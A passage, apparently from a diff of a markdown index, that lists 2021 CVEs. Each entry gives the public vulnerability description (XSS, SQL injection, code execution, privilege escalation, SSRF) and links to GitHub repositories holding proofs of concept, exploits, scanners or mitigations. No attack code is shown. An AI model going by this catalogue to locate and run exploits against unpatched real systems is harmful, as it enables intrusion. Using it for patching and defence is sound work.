[Sp00p64/PyNightmare](https://github.com/Sp00p64/PyNightmare) +- [jmaddington/Serious-Sam---CVE-2021-36934-Mitigation-for-Datto-RMM](https://github.com/jmaddington/Serious-Sam---CVE-2021-36934-Mitigation-for-Datto-RMM) +- [0x0D1n/CVE-2021-36934](https://github.com/0x0D1n/CVE-2021-36934) +- [exploitblizzard/CVE-2021-36934](https://github.com/exploitblizzard/CVE-2021-36934) +- [irissentinel/CVE-2021-36934](https://github.com/irissentinel/CVE-2021-36934) +- [websecnl/CVE-2021-36934](https://github.com/websecnl/CVE-2021-36934) +- [grishinpv/poc_CVE-2021-36934](https://github.com/grishinpv/poc_CVE-2021-36934) +- [shaktavist/SeriousSam](https://github.com/shaktavist/SeriousSam) +- [OlivierLaflamme/CVE-2021-36934-export-shadow-volume-POC](https://github.com/OlivierLaflamme/CVE-2021-36934-export-shadow-volume-POC) +- [chron1k/oxide_hive](https://github.com/chron1k/oxide_hive) + +### CVE-2021-36949 (2021-08-12) + +Microsoft Azure Active Directory Connect Authentication Bypass Vulnerability + + +- [Maxwitat/Check-AAD-Connect-for-CVE-2021-36949-vulnerability](https://github.com/Maxwitat/Check-AAD-Connect-for-CVE-2021-36949-vulnerability) + +### CVE-2021-36955 (2021-09-15) + +Windows Common Log File System Driver Elevation of Privilege Vulnerability + + +- [JiaJinRong12138/CVE-2021-36955-EXP](https://github.com/JiaJinRong12138/CVE-2021-36955-EXP) + +### CVE-2021-36981 (2021-08-31) + +In the server in SerNet verinice before 1.22.2, insecure Java deserialization allows remote authenticated attackers to execute arbitrary code. + + +- [0xBrAinsTorM/CVE-2021-36981](https://github.com/0xBrAinsTorM/CVE-2021-36981) + +### CVE-2021-37152 (2021-08-10) + +Multiple XSS issues exist in Sonatype Nexus Repository Manager 3 before 3.33.0. An authenticated attacker with the ability to add HTML files to a repository could redirect users to Nexus Repository Manager’s pages with code modifications. + + +- [SecurityAnalysts/CVE-2021-37152](https://github.com/SecurityAnalysts/CVE-2021-37152) + +### CVE-2021-37580 (2021-11-16) + +A flaw was found in Apache ShenYu Admin. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. This issue affected Apache ShenYu 2.3.0 and 2.4.0 + + +- [rabbitsafe/CVE-2021-37580](https://github.com/rabbitsafe/CVE-2021-37580) +- [fengwenhua/CVE-2021-37580](https://github.com/fengwenhua/CVE-2021-37580) +- [Osyanina/westone-CVE-2021-37580-scanner](https://github.com/Osyanina/westone-CVE-2021-37580-scanner) +- [ZororoZ/CVE-2021-37580](https://github.com/ZororoZ/CVE-2021-37580) +- [Liang2580/CVE-2021-37580](https://github.com/Liang2580/CVE-2021-37580) +- [Wing-song/CVE-2021-37580](https://github.com/Wing-song/CVE-2021-37580) +- [CN016/Apache-ShenYu-Admin-JWT-CVE-2021-37580-](https://github.com/CN016/Apache-ShenYu-Admin-JWT-CVE-2021-37580-) + +### CVE-2021-37624 (2021-10-25) + +FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing. By default, SIP requests of the type MESSAGE (RFC 3428) are not authenticated in the affected versions of FreeSWITCH. MESSAGE requests are relayed to SIP user agents registered with the FreeSWITCH server without requiring any authentication. Although this behaviour can be changed by setting the `auth-messages` parameter to `true`, it is not the default setting. Abuse of this security issue allows attackers to send SIP MESSAGE messages to any SIP user agent that is registered with the server without requiring authentication. Additionally, since no authentication is required, chat messages can be spoofed to appear to come from trusted entities. Therefore, abuse can lead to spam and enable social engineering, phishing and similar attacks. This issue is patched in version 1.10.7. Maintainers recommend that this SIP message type is authenticated by default so that FreeSWITCH administrators do not need to be explicitly set the `auth-messages` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication. + + +- [0xInfection/PewSWITCH](https://github.com/0xInfection/PewSWITCH) + +### CVE-2021-37678 (2021-08-12) + +TensorFlow is an end-to-end open source platform for machine learning. In affected versions TensorFlow and Keras can be tricked to perform arbitrary code execution when deserializing a Keras model from YAML format. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/python/keras/saving/model_config.py#L66-L104) uses `yaml.unsafe_load` which can perform arbitrary code execution on the input. Given that YAML format support requires a significant amount of work, we have removed it for now. We have patched the issue in GitHub commit 23d6383eb6c14084a8fc3bdf164043b974818012. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + + +- [fran-CICS/ExploitTensorflowCVE-2021-37678](https://github.com/fran-CICS/ExploitTensorflowCVE-2021-37678) + +### CVE-2021-37740 (2022-04-20) + +A denial of service vulnerability exists in MDT's firmware for the KNXnet/IP Secure router SCN-IP100.03 and KNX IP interface SCN-IP000.03 before v3.0.4, that allows a remote attacker to turn the device unresponsive to all requests on the KNXnet/IP Secure layer, until the device is rebooted, via a SESSION_REQUEST frame with a modified total length field. + + +- [robertguetzkow/CVE-2021-37740](https://github.com/robertguetzkow/CVE-2021-37740) + +### CVE-2021-37748 (2021-10-28) + +Multiple buffer overflows in the limited configuration shell (/sbin/gs_config) on Grandstream HT801 devices before 1.0.29 allow remote authenticated users to execute arbitrary code as root via a crafted manage_if setting, thus bypassing the intended restrictions of this shell and taking full control of the device. There are default weak credentials that can be used to authenticate. + + +- [SECFORCE/CVE-2021-37748](https://github.com/SECFORCE/CVE-2021-37748) + +### CVE-2021-37832 (2021-08-03) + +A SQL injection vulnerability exists in version 3.0.2 of Hotel Druid when SQLite is being used as the application database. A malicious attacker can issue SQL commands to the SQLite database through the vulnerable idappartamenti parameter. + + +- [dievus/CVE-2021-37832](https://github.com/dievus/CVE-2021-37832) +- [AK-blank/CVE-2021-37832](https://github.com/AK-blank/CVE-2021-37832) + +### CVE-2021-37833 (2021-08-03) + +A reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands. + + +- [dievus/CVE-2021-37833](https://github.com/dievus/CVE-2021-37833) + +### CVE-2021-37910 (2021-11-12) + +ASUS routers Wi-Fi protected access protocol (WPA2 and WPA3-SAE) has improper control of Interaction frequency vulnerability, an unauthenticated attacker can remotely disconnect other users' connections by sending specially crafted SAE authentication frames. + + +- [efchatz/easy-exploits](https://github.com/efchatz/easy-exploits) + +### CVE-2021-37975 (2021-10-08) + +Use after free in V8 in Google Chrome prior to 94.0.4606.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [ssaroussi/CVE-2021-37975](https://github.com/ssaroussi/CVE-2021-37975) + +### CVE-2021-37980 (2021-11-02) + +Inappropriate implementation in Sandbox in Google Chrome prior to 94.0.4606.81 allowed a remote attacker to potentially bypass site isolation via Windows. + + +- [ZeusBox/CVE-2021-37980](https://github.com/ZeusBox/CVE-2021-37980) + +### CVE-2021-38001 (2021-11-23) + +Type confusion in V8 in Google Chrome prior to 95.0.4638.69 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [maldiohead/TFC-Chrome-v8-bug-CVE-2021-38001-poc](https://github.com/maldiohead/TFC-Chrome-v8-bug-CVE-2021-38001-poc) +- [Peterpan0927/TFC-Chrome-v8-bug-CVE-2021-38001-poc](https://github.com/Peterpan0927/TFC-Chrome-v8-bug-CVE-2021-38001-poc) + +### CVE-2021-38003 (2021-11-23) + +Inappropriate implementation in V8 in Google Chrome prior to 95.0.4638.69 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [SpiralBL0CK/Chrome-V8-RCE-CVE-2021-38003](https://github.com/SpiralBL0CK/Chrome-V8-RCE-CVE-2021-38003) + +### CVE-2021-38149 (2021-08-06) + +index.php/admin/add_user in Chikitsa Patient Management System 2.0.0 allows XSS. + + +- [jboogie15/CVE-2021-38149](https://github.com/jboogie15/CVE-2021-38149) + +### CVE-2021-38163 (2021-09-14) + +SAP NetWeaver (Visual Composer 7.0 RT) versions - 7.30, 7.31, 7.40, 7.50, without restriction, an attacker authenticated as a non-administrative user can upload a malicious file over a network and trigger its processing, which is capable of running operating system commands with the privilege of the Java Server process. These commands can be used to read or modify any information on the server or shut the server down making it unavailable.\n\n + + +- [core1impact/CVE-2021-38163](https://github.com/core1impact/CVE-2021-38163) + +### CVE-2021-38185 (2021-08-07) + +GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers an out-of-bounds heap write. NOTE: it is unclear whether there are common cases where the pattern file, associated with the -E option, is untrusted data. + + +- [fangqyi/cpiopwn](https://github.com/fangqyi/cpiopwn) + +### CVE-2021-38295 (2021-10-14) + +In Apache CouchDB, a malicious user with permission to create documents in a database is able to attach a HTML attachment to a document. If a CouchDB admin opens that attachment in a browser, e.g. via the CouchDB admin interface Fauxton, any JavaScript code embedded in that HTML attachment will be executed within the security context of that admin. A similar route is available with the already deprecated _show and _list functionality. This privilege escalation vulnerability allows an attacker to add or remove data in any database or make configuration changes. This issue affected Apache CouchDB prior to 3.1.2 + + +- [ProfessionallyEvil/CVE-2021-38295-PoC](https://github.com/ProfessionallyEvil/CVE-2021-38295-PoC) + +### CVE-2021-38297 (2021-10-18) + +Go before 1.16.9 and 1.17.x before 1.17.2 has a Buffer Overflow via large arguments in a function invocation from a WASM module, when GOARCH=wasm GOOS=js is used. + + +- [gkrishnan724/CVE-2021-38297](https://github.com/gkrishnan724/CVE-2021-38297) +- [paras98/CVE-2021-38297-Go-wasm-Replication](https://github.com/paras98/CVE-2021-38297-Go-wasm-Replication) + +### CVE-2021-38314 (2021-09-02) + +The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`. + + +- [orangmuda/CVE-2021-38314](https://github.com/orangmuda/CVE-2021-38314) +- [phrantom/cve-2021-38314](https://github.com/phrantom/cve-2021-38314) +- [shubhayu-64/CVE-2021-38314](https://github.com/shubhayu-64/CVE-2021-38314) +- [twseptian/cve-2021-38314](https://github.com/twseptian/cve-2021-38314) +- [c0ff33b34n/CVE-2021-38314](https://github.com/c0ff33b34n/CVE-2021-38314) +- [akhilkoradiya/CVE-2021-38314](https://github.com/akhilkoradiya/CVE-2021-38314) +- [0xGabe/CVE-2021-38314](https://github.com/0xGabe/CVE-2021-38314) + +### CVE-2021-38540 (2021-09-09) + +The variable import endpoint was not protected by authentication in Airflow >=2.0.0, <2.1.3. This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution. This issue affects Apache Airflow >=2.0.0, <2.1.3. + + +- [Captain-v-hook/PoC-for-CVE-2021-38540-](https://github.com/Captain-v-hook/PoC-for-CVE-2021-38540-) + +### CVE-2021-38560 (2022-02-01) + +Ivanti Service Manager 2021.1 allows reflected XSS via the appName parameter associated with ConfigDB calls, such as in RelocateAttachments.aspx. + + +- [os909/iVANTI-CVE-2021-38560](https://github.com/os909/iVANTI-CVE-2021-38560) + +### CVE-2021-38583 (2021-08-13) + +openBaraza HCM 3.1.6 does not properly neutralize user-controllable input, which allows reflected cross-site scripting (XSS) on multiple pages: hr/subscription.jsp and hr/application.jsp and and hr/index.jsp (with view= and data=). + + +- [charlesbickel/CVE-2021-38583](https://github.com/charlesbickel/CVE-2021-38583) + +### CVE-2021-38602 (2021-08-12) + +PluXML 5.8.7 allows Article Editing stored XSS via Headline or Content. + + +- [KielVaughn/CVE-2021-38602](https://github.com/KielVaughn/CVE-2021-38602) + +### CVE-2021-38603 (2021-08-12) + +PluXML 5.8.7 allows core/admin/profil.php stored XSS via the Information field. + + +- [KielVaughn/CVE-2021-38603](https://github.com/KielVaughn/CVE-2021-38603) + +### CVE-2021-38619 (2021-08-13) + +openBaraza HCM 3.1.6 does not properly neutralize user-controllable input: an unauthenticated remote attacker can conduct a stored cross-site scripting (XSS) attack against an administrative user from hr/subscription.jsp and hr/application.jsp and and hr/index.jsp (with view=). + + +- [charlesbickel/CVE-2021-38619](https://github.com/charlesbickel/CVE-2021-38619) + +### CVE-2021-38639 (2021-09-15) + +Win32k Elevation of Privilege Vulnerability + + +- [DarkSprings/CVE-2021-38639](https://github.com/DarkSprings/CVE-2021-38639) + +### CVE-2021-38647 (2021-09-15) + +Open Management Infrastructure Remote Code Execution Vulnerability + + +- [corelight/CVE-2021-38647](https://github.com/corelight/CVE-2021-38647) +- [midoxnet/CVE-2021-38647](https://github.com/midoxnet/CVE-2021-38647) +- [horizon3ai/CVE-2021-38647](https://github.com/horizon3ai/CVE-2021-38647) +- [Immersive-Labs-Sec/cve-2021-38647](https://github.com/Immersive-Labs-Sec/cve-2021-38647) +- [marcosimioni/omigood](https://github.com/marcosimioni/omigood) +- [craig-m-unsw/omigod-lab](https://github.com/craig-m-unsw/omigod-lab) +- [SimenBai/CVE-2021-38647-POC-and-Demo-environment](https://github.com/SimenBai/CVE-2021-38647-POC-and-Demo-environment) +- [AlteredSecurity/CVE-2021-38647](https://github.com/AlteredSecurity/CVE-2021-38647) +- [abousteif/cve-2021-38647](https://github.com/abousteif/cve-2021-38647) +- [Vulnmachines/OMIGOD_cve-2021-38647](https://github.com/Vulnmachines/OMIGOD_cve-2021-38647) +- [goofsec/omigod](https://github.com/goofsec/omigod) +- [corelight/CVE-2021-38647-noimages](https://github.com/corelight/CVE-2021-38647-noimages) + +### CVE-2021-38666 (2021-11-10) + +Remote Desktop Client Remote Code Execution Vulnerability + + +- [DarkSprings/CVE-2021-38666-poc](https://github.com/DarkSprings/CVE-2021-38666-poc) +- [JaneMandy/CVE-2021-38666](https://github.com/JaneMandy/CVE-2021-38666) + +### CVE-2021-38699 (2021-08-15) + +TastyIgniter 3.0.7 allows XSS via /account, /reservation, /admin/dashboard, and /admin/system_logs. + + +- [HuskyHacks/CVE-2021-38699-Reflected-XSS](https://github.com/HuskyHacks/CVE-2021-38699-Reflected-XSS) +- [HuskyHacks/CVE-2021-38699-Stored-XSS](https://github.com/HuskyHacks/CVE-2021-38699-Stored-XSS) +- [Justin-1993/CVE-2021-38699](https://github.com/Justin-1993/CVE-2021-38699) + +### CVE-2021-38817 +- [HuskyHacks/CVE-2021-38817-Remote-OS-Command-Injection](https://github.com/HuskyHacks/CVE-2021-38817-Remote-OS-Command-Injection) + +### CVE-2021-38819 (2022-11-16) + +A SQL injection vulnerability exits on the Simple Image Gallery System 1.0 application through "id" parameter on the album page. + + +- [m4sk0ff/CVE-2021-38819](https://github.com/m4sk0ff/CVE-2021-38819) + +### CVE-2021-39115 (2021-09-01) + +Affected versions of Atlassian Jira Service Management Server and Data Center allow remote attackers with "Jira Administrators" access to execute arbitrary Java code or run arbitrary system commands via a Server_Side Template Injection vulnerability in the Email Template feature. The affected versions are before version 4.13.9, and from version 4.14.0 before 4.18.0. + + +- [PetrusViet/CVE-2021-39115](https://github.com/PetrusViet/CVE-2021-39115) + +### CVE-2021-39141 (2021-08-23) + +XStream is a simple library to serialize objects to XML and back again. In affected versions this vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose. + + +- [zwjjustdoit/Xstream-1.4.17](https://github.com/zwjjustdoit/Xstream-1.4.17) + +### CVE-2021-39165 (2021-08-26) + +Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet <https://github.com/CachetHQ/Cachet> is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected. + + +- [W0rty/CVE-2021-39165](https://github.com/W0rty/CVE-2021-39165) +- [manbolq/CVE-2021-39165](https://github.com/manbolq/CVE-2021-39165) + +### CVE-2021-39172 (2021-08-27) + +Cachet is an open source status page system. Prior to version 2.5.1, authenticated users, regardless of their privileges (User or Admin), can exploit a new line injection in the configuration edition feature (e.g. mail settings) and gain arbitrary code execution on the server. This issue was addressed in version 2.5.1 by improving `UpdateConfigCommandHandler` and preventing the use of new lines characters in new configuration values. As a workaround, only allow trusted source IP addresses to access to the administration dashboard. + + +- [W1ngLess/CVE-2021-39172-RCE](https://github.com/W1ngLess/CVE-2021-39172-RCE) + +### CVE-2021-39174 (2021-08-27) + +Cachet is an open source status page system. Prior to version 2.5.1, authenticated users, regardless of their privileges (User or Admin), can leak the value of any configuration entry of the dotenv file, e.g. the application secret (`APP_KEY`) and various passwords (email, database, etc). This issue was addressed in version 2.5.1 by improving `UpdateConfigCommandHandler` and preventing the use of nested variables in the resulting dotenv configuration file. As a workaround, only allow trusted source IP addresses to access to the administration dashboard. + + +- [n0kovo/CVE-2021-39174-PoC](https://github.com/n0kovo/CVE-2021-39174-PoC) +- [hadrian3689/cachet_2.4.0-dev](https://github.com/hadrian3689/cachet_2.4.0-dev) + +### CVE-2021-39273 (2021-08-19) + +In XeroSecurity Sn1per 9.0 (free version), insecure permissions (0777) are set upon application execution, allowing an unprivileged user to modify the application, modules, and configuration files. This leads to arbitrary code execution with root privileges. + + +- [nikip72/CVE-2021-39273-CVE-2021-39274](https://github.com/nikip72/CVE-2021-39273-CVE-2021-39274) + +### CVE-2021-39287 +- [Fearless523/CVE-2021-39287-Stored-XSS](https://github.com/Fearless523/CVE-2021-39287-Stored-XSS) + +### CVE-2021-39377 (2021-09-01) + +A SQL Injection vulnerability exists in openSIS 8.0 when MySQL (MariaDB) is being used as the application database. A malicious attacker can issue SQL commands to the MySQL (MariaDB) database through the index.php username parameter. + + +- [security-n/CVE-2021-39377](https://github.com/security-n/CVE-2021-39377) + +### CVE-2021-39378 (2021-09-01) + +A SQL Injection vulnerability exists in openSIS 8.0 when MySQL (MariaDB) is being used as the application database. A malicious attacker can issue SQL commands to the MySQL (MariaDB) database through the NamesList.php str parameter. + + +- [security-n/CVE-2021-39378](https://github.com/security-n/CVE-2021-39378) + +### CVE-2021-39379 (2021-09-01) + +A SQL Injection vulnerability exists in openSIS 8.0 when MySQL (MariaDB) is being used as the application database. A malicious attacker can issue SQL commands to the MySQL (MariaDB) database through the ResetUserInfo.php password_stn_id parameter. + + +- [security-n/CVE-2021-39379](https://github.com/security-n/CVE-2021-39379) + +### CVE-2021-39408 (2022-06-24) + +Cross Site Scripting (XSS) vulnerability exists in Online Student Rate System 1.0 via the page parameter on the index.php file + + +- [StefanDorresteijn/CVE-2021-39408](https://github.com/StefanDorresteijn/CVE-2021-39408) + +### CVE-2021-39409 (2022-06-24) + +A vulnerability exists in Online Student Rate System v1.0 that allows any user to register as an administrator without needing to be authenticated. + + +- [StefanDorresteijn/CVE-2021-39409](https://github.com/StefanDorresteijn/CVE-2021-39409) + +### CVE-2021-39433 (2021-10-04) + +A local file inclusion (LFI) vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user. + + +- [PinkDraconian/CVE-2021-39433](https://github.com/PinkDraconian/CVE-2021-39433) +- [ibnurusdianto/CVE-2021-39433](https://github.com/ibnurusdianto/CVE-2021-39433) + +### CVE-2021-39473 (2022-11-04) + +Saibamen HotelManager v1.2 is vulnerable to Cross Site Scripting (XSS) due to improper sanitization of comment and contact fields. + + +- [BrunoTeixeira1996/CVE-2021-39473](https://github.com/BrunoTeixeira1996/CVE-2021-39473) + +### CVE-2021-39475 +- [W4RCL0UD/CVE-2021-39475](https://github.com/W4RCL0UD/CVE-2021-39475) + +### CVE-2021-39476 +- [W4RCL0UD/CVE-2021-39476](https://github.com/W4RCL0UD/CVE-2021-39476) + +### CVE-2021-39512 +- [guusec/CVE-2021-39512-BigTreeCMS-v4.4.14-AccountTakeOver](https://github.com/guusec/CVE-2021-39512-BigTreeCMS-v4.4.14-AccountTakeOver) + +### CVE-2021-39670 (2022-05-10) + +In setStream of WallpaperManager.java, there is a possible way to cause a permanent DoS due to improper input validation. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12LAndroid ID: A-204087139 + + +- [Supersonic/Wallbreak](https://github.com/Supersonic/Wallbreak) + +### CVE-2021-39685 (2022-03-16) + +In various setup methods of the USB gadget subsystem, there is a possible out of bounds write due to an incorrect flag check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-210292376References: Upstream kernel + + +- [szymonh/inspector-gadget](https://github.com/szymonh/inspector-gadget) + +### CVE-2021-39692 (2022-03-16) + +In onCreate of SetupLayoutActivity.java, there is a possible way to setup a work profile bypassing user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-209611539 + + +- [nanopathi/packages_apps_ManagedProvisioning_CVE-2021-39692](https://github.com/nanopathi/packages_apps_ManagedProvisioning_CVE-2021-39692) + +### CVE-2021-39696 (2022-08-09) + +In Task.java, there is a possible escalation of privilege due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-185810717 + + +- [nidhihcl/frameworks_base_AOSP_10_r33_CVE-2021-39696](https://github.com/nidhihcl/frameworks_base_AOSP_10_r33_CVE-2021-39696) + +### CVE-2021-39704 (2022-03-16) + +In deleteNotificationChannelGroup of NotificationManagerService.java, there is a possible way to run foreground service without user notification due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-209965481 + + +- [nanopathi/framework_base_AOSP10_r33_CVE-2021-39704](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-39704) + +### CVE-2021-39706 (2022-03-16) + +In onResume of CredentialStorage.java, there is a possible way to cleanup content of credentials storage due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-200164168 + + +- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-39706](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-39706) + +### CVE-2021-39749 (2022-03-30) + +In WindowManager, there is a possible way to start non-exported and protected activities due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-205996115 + + +- [michalbednarski/OrganizerTransaction](https://github.com/michalbednarski/OrganizerTransaction) + +### CVE-2021-39863 (2021-09-29) + +Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by a Buffer Overflow vulnerability when parsing a specially crafted PDF file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. + + +- [lsw29475/CVE-2021-39863](https://github.com/lsw29475/CVE-2021-39863) +- [WHS-SEGFAULT/CVE-2021-39863](https://github.com/WHS-SEGFAULT/CVE-2021-39863) + +### CVE-2021-40101 (2021-11-30) + +An issue was discovered in Concrete CMS before 8.5.7. The Dashboard allows a user's password to be changed without a prompt for the current password. + + +- [S1lkys/CVE-2021-40101](https://github.com/S1lkys/CVE-2021-40101) + +### CVE-2021-40113 (2021-11-04) + +Multiple vulnerabilities in the web-based management interface of the Cisco Catalyst Passive Optical Network (PON) Series Switches Optical Network Terminal (ONT) could allow an unauthenticated, remote attacker to perform the following actions: Log in with a default credential if the Telnet protocol is enabled Perform command injection Modify the configuration For more information about these vulnerabilities, see the Details section of this advisory. + + +- [karamMahmad/CVE-2021-40113](https://github.com/karamMahmad/CVE-2021-40113) + +### CVE-2021-40154 (2021-12-01) + +NXP LPC55S69 devices before A3 have a buffer over-read via a crafted wlength value in a GET Descriptor Configuration request during use of USB In-System Programming (ISP) mode. This discloses protected flash memory. + + +- [Jeromeyoung/CVE-2021-40154](https://github.com/Jeromeyoung/CVE-2021-40154) + +### CVE-2021-40222 (2021-09-09) + +Rittal CMC PU III Web management Version affected: V3.11.00_2. Version fixed: V3.17.10 is affected by a remote code execution vulnerablity. It is possible to introduce shell code to create a reverse shell in the PU-Hostname field of the TCP/IP Configuration dialog. Web application fails to sanitize user input on Network TCP/IP configuration page. This allows the attacker to inject commands as root on the device which will be executed once the data is received. + + +- [asang17/CVE-2021-40222](https://github.com/asang17/CVE-2021-40222) + +### CVE-2021-40223 (2021-09-09) + +Rittal CMC PU III Web management (version V3.11.00_2) fails to sanitize user input on several parameters of the configuration (User Configuration dialog, Task Configuration dialog and set logging filter dialog). This allows an attacker to backdoor the device with HTML and browser-interpreted content (such as JavaScript or other client-side scripts). The XSS payload will be triggered when the user accesses some specific sections of the application. + + +- [asang17/CVE-2021-40223](https://github.com/asang17/CVE-2021-40223) + +### CVE-2021-40303 (2022-11-08) + +perfex crm 1.10 is vulnerable to Cross Site Scripting (XSS) via /clients/profile. + + +- [zecopro/CVE-2021-40303](https://github.com/zecopro/CVE-2021-40303) + +### CVE-2021-40345 (2021-10-26) + +An issue was discovered in Nagios XI 5.8.5. In the Manage Dashlets section of the Admin panel, an administrator can upload ZIP files. A command injection (within the name of the first file in the archive) allows an attacker to execute system commands. + + +- [ArianeBlow/NagiosXI-RCE-all-version-CVE-2021-40345](https://github.com/ArianeBlow/NagiosXI-RCE-all-version-CVE-2021-40345) + +### CVE-2021-40346 (2021-09-08) + +An integer overflow exists in HAProxy 2.0 through 2.5 in htx_add_header that can be exploited to perform an HTTP request smuggling attack, allowing an attacker to bypass all configured http-request HAProxy ACLs and possibly other ACLs. + + +- [knqyf263/CVE-2021-40346](https://github.com/knqyf263/CVE-2021-40346) +- [donky16/CVE-2021-40346-POC](https://github.com/donky16/CVE-2021-40346-POC) +- [alikarimi999/CVE-2021-40346](https://github.com/alikarimi999/CVE-2021-40346) +- [Vulnmachines/HAProxy_CVE-2021-40346](https://github.com/Vulnmachines/HAProxy_CVE-2021-40346) +- [alexOarga/CVE-2021-40346](https://github.com/alexOarga/CVE-2021-40346) + +### CVE-2021-40352 (2021-09-01) + +OpenEMR 6.0.0 has a pnotes_print.php?noteid= Insecure Direct Object Reference vulnerability via which an attacker can read the messages of all users. + + +- [allenenosh/CVE-2021-40352](https://github.com/allenenosh/CVE-2021-40352) + +### CVE-2021-40353 (2021-09-01) + +A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the index.php USERNAME parameter. NOTE: this issue may exist because of an incomplete fix for CVE-2020-6637. + + +- [5qu1n7/CVE-2021-40353](https://github.com/5qu1n7/CVE-2021-40353) + +### CVE-2021-40373 (2021-09-10) + +playSMS before 1.4.5 allows Arbitrary Code Execution by entering PHP code at the #tabs-information-page of core_main_config, and then executing that code via the index.php?app=main&inc=core_welcome URI. + + +- [maikroservice/CVE-2021-40373](https://github.com/maikroservice/CVE-2021-40373) + +### CVE-2021-40374 (2022-04-06) + +A stored cross-site scripting (XSS) vulnerability was identified in Apperta Foundation OpenEyes 3.5.1. Updating a patient's details allows remote attackers to inject arbitrary web script or HTML via the Address1 parameter. This JavaScript then executes when the patient profile is loaded, which could be used in a XSS attack. + + +- [DCKento/CVE-2021-40374](https://github.com/DCKento/CVE-2021-40374) + +### CVE-2021-40375 (2022-04-06) + +Apperta Foundation OpenEyes 3.5.1 allows remote attackers to view the sensitive information of patients without having the intended level of privilege. Despite OpenEyes returning a Forbidden error message, the contents of a patient's profile are still returned in the server response. This response can be read in an intercepting proxy or by viewing the page source. Sensitive information returned in responses includes patient PII and medication records or history. + + +- [DCKento/CVE-2021-40375](https://github.com/DCKento/CVE-2021-40375) + +### CVE-2021-40438 (2021-09-16) + +A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. + + +- [xiaojiangxl/CVE-2021-40438](https://github.com/xiaojiangxl/CVE-2021-40438) +- [sixpacksecurity/CVE-2021-40438](https://github.com/sixpacksecurity/CVE-2021-40438) +- [BabyTeam1024/CVE-2021-40438](https://github.com/BabyTeam1024/CVE-2021-40438) +- [ericmann/apache-cve-poc](https://github.com/ericmann/apache-cve-poc) +- [pisut4152/Sigma-Rule-for-CVE-2021-40438-exploitation-attempt](https://github.com/pisut4152/Sigma-Rule-for-CVE-2021-40438-exploitation-attempt) +- [Kashkovsky/CVE-2021-40438](https://github.com/Kashkovsky/CVE-2021-40438) +- [gassara-kys/CVE-2021-40438](https://github.com/gassara-kys/CVE-2021-40438) +- [sergiovks/CVE-2021-40438-Apache-2.4.48-SSRF-exploit](https://github.com/sergiovks/CVE-2021-40438-Apache-2.4.48-SSRF-exploit) +- [Cappricio-Securities/CVE-2021-40438](https://github.com/Cappricio-Securities/CVE-2021-40438) + +### CVE-2021-40444 (2021-09-15) + +<p>Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.</p>\n<p>An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the 